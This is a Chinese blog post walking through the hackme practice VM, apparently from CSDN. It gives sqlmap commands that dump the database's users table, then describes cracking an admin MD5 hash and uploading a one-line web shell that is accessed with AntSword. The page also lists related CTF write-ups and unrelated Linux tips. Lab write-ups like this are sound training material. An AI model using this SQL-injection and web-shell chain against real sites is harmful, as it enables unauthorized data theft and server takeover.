hackme靶机通关攻略

于 2024-09-03 18:03:11 发布
阅读量127 收藏 3
点赞数 6
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shw_yzh/article/details/141867290
版权

1.登陆靶场网站首页

2.注册登录

3.单机search,有很多书

4.搜索一本书抓包发放到重放器

5.数据改为1*,复制数据包到1.txt,发到kali里面

6.sqlmap查看当前数据库

sqlmap -r '/home/kali/Desktop/1.txt'  --current-db --batch

7.查看表名

sqlmap -r '/home/kali/Desktop/1.txt' -D webapphacking --tables --batch

8.查看users表中列

sqlmap -r '/home/kali/Desktop/1.txt' -D webapphacking -T users --columns --batch

9.查看表中数据信息

10.MD5解密superadmin 密码

11.账号superadmin 密码Uncrackable登录

12.上传一句话木马

上面显示上传到uploads文件夹里

13.访问uploads文件夹

14.蚁剑连接

2407-2 shw
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞payload 靶机_hackme:2 靶机攻略
weixin_42354108的博客
01-16 1069
原标题:hackme:2 靶机攻略 0x01 背景:hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!0x02 技术关键词:SQL注入、WAF Bypass、模糊测试、文件上传、suid提权0x03 靶机发现与...
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3999
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 217
靶场通关 | hackme.ova靶机通关秘籍~
靶机通关| hackme.ova通关攻略
a96482的博客
07-29 371
GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。最后经判断为sql注入类型。
Hackme靶机渗透
m0_50584370的博客
06-01 245
hackme靶机渗透
DVWA靶机通关攻略第三关——CSRF攻击
小飞飞的博客
03-09 1021
DVWA靶机通关攻略请求伪造详细教学
DVWA靶机通关攻略第四关——文件包含
小飞飞的博客
03-11 787
DVWA靶机的文件包含详细教学
DVWA靶机通关攻略第五关——文件上传
小飞飞的博客
03-11 956
DVWA靶机文件上传详细教学
HACKME:1靶机
JKding123的博客
10-22 972
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
在Ubuntu/Linux下重温FC游戏——超级玛丽奥
最新发布
bluebird_shao的专栏
09-02 1110
FC 模拟器是指能够在某种机器上运行 FC 游戏的程序,FC 模拟器有好几种,Linux 平台下的 FCEUX 是一款功能强大的免费 FC/NES 模拟器,你可以使用它重温那些经典的游戏。
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
AsherGu的博客
08-29 1168
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
LinuxLinux Bash Shell 教程
Young_Pro的博客
08-27 1579
Linux bash(Bourne-Again SHell)是一种为GNU操作系统编写的命令行解释器,它是大多数Linux发行版中最常用的shell。Bash提供了一种强大的方式来控制和管理操作系统,支持命令历史记录、别名、管道、重定向、变量、条件判断、循环以及自定义脚本编写等功能,使得用户能够通过简单的命令行指令执行复杂的任务,是系统管理员和开发人员日常工作中的得力工具。
linux 中如何将.c 文件转换为可执行文件
千千道的博客
08-29 1687
Linux 环境下进行 C 语言编程时,将.c文件转换为可执行文件是一个关键的步骤。这个过程涉及到使用编译器和一些相关的工具,本文将详细介绍在 Linux 系统中如何将.c文件转换为可执行文件的方法。
Linux中杀死占用某个端口的进程
靖妖傩舞
08-28 673
选项表示强制终止进程,但这种方式可能会导致数据丢失或其他不良后果,所以在使用时要谨慎。确定要杀死的进程 PID。从上述步骤中获取到占用端口 9997 的进程 PID。
Linux 命令行快捷键
sun007700的专栏
08-30 541
涉及在linux命令行下进行快速移动光标、命令编辑、编辑后执行历史命令、Bang(!Ctrl+y: 粘贴Ctrl+u或ctrl+k剪切的内容。Alt – d :由光标位置开始,往右删除单词。Alt – d: 先按住 Alt 键,然后再按 d 键;Ctrl+u:删除当前光标前面的文字 (还有剪切功能)Ctrl+k:删除当前光标后面的文字 (还有剪切功能)M – k:先单击 Esc 键,然后再按 k 键。Ctrl+w: 删除光标前面的单词。Ctrl+左右键:在单词之间跳转。Ctrl+a: 跳到本行的行首。
Linux下IO多路复用—select,poll,epoll
热土程序园,利他愉己~
08-29 1408
Linux下IO多路复用—select,poll,epoll IO多路复用是一种操作系统的技术,用于在单个线程或进程中管理多个输入输出操作。它的主要目的是通过将多个IO操作合并到一个系统调用中来提高系统的性能和资源利用率,避免了传统的多线程或多进程模型中因为阻塞IO而导致的资源浪费和低效率问题。 在IO多路复用中,通常使用的系统调用有 select()、poll()、epoll() 等,它们允许程序等待多个文件描述符(sockets、文件句柄等)中的任何一个变为可读或可写,然后再进行实际的IO操作。
linux查找mysql日志
爱思考的People
08-30 482
MySQL的日志文件通常存储在数据库服务器的数据目录下,具体位置取决于MySQL的配置文件。# 查找MySQL配置文件# 查找MySQL日志文件。
虚拟机Linux(Centos7)系统静态IP设置
BQ Blog
08-30 1095
这篇博客介绍了在虚拟机中配置Linux系统的静态IP地址的方法,适用于通过DHCP获取IP地址导致频繁更换IP的情况。首先,用户需要将虚拟机的网络模式更改为NAT模式,并在虚拟机网络编辑器中记录子网IP、子网掩码和网关。然后,编辑相应的网络配置文件,将网络协议更改为静态,并手动设置静态IP地址、子网掩码、网关和DNS。最后,重启网络服务并验证配置是否生效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值